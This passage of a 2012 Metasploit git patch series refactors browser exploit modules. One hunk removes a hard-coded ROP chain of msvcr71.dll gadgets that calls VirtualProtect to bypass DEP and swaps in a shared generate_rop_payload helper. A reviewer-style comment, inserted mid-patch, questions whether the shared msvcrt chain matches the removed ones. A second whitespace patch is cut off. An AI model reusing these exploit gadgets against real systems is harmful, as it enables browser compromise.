- 0x7c351e05, # NEG EAX # RETN
- 0x7c345255, # INC EBX # FPATAN # RETN
- 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
- 0x7c344f87, # POP EDX # RETN
- 0xffffffc0, # Value to negate, will become 0x00000040
- 0x7c351eb1, # NEG EDX # RETN
- 0x7c34d201, # POP ECX # RETN
- 0x7c38b001, # &Writable location
- 0x7c347f97, # POP EAX # RETN
- 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
- 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
- 0x7c345c30, # ptr to 'push esp # ret '
- ].pack("V*")
+ rop_payload = generate_rop_payload('java', code)
 end
- code = rop + code
- return code
+ return rop_payload
 end
 def on_request_uri(cli, request)
From 21ea77ff8bc82fa09338dda2d0919951f9c6f687 Mon Sep 17 00:00:00 2001 
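Review bot: The msvcrt chain removed here is not the plain variant removed from ms12_037_same_id.rb and msxml_get_definition_code_exec.rb — it has two extra leading entries (`0x77C21891, # POP ESI # RETN` and `0x0c0c0c04, # ESI`) and an `XCHG EAX,ESI` gadget in place of the bare `0x77c2dd6c` — yet all three modules now request the same `'msvcrt'` entry via `rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})`. If the shared DB entry is the plain variant, this module's behaviour changes silently; the author should confirm which chain RopDb stores, and a comment on that line recording the answer (e.g. `# RopDb msvcrt chain already includes the ESI set-up the old inline chain carried` or the opposite) would save the next reader the same check. Dropping both `exec_size` assignments is correct here, since the removed chains were their only readers. get_payload's start lies outside the hunk.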
From: sinn3r
Date: Fri, 5 Oct 2012 15:40:37 -0500
Subject: [PATCH 9/9] Fix spaces
---
 modules/exploits/windows/browser/ie_execcommand_uaf.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index 52739b323c..82f6de7c9a 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote + |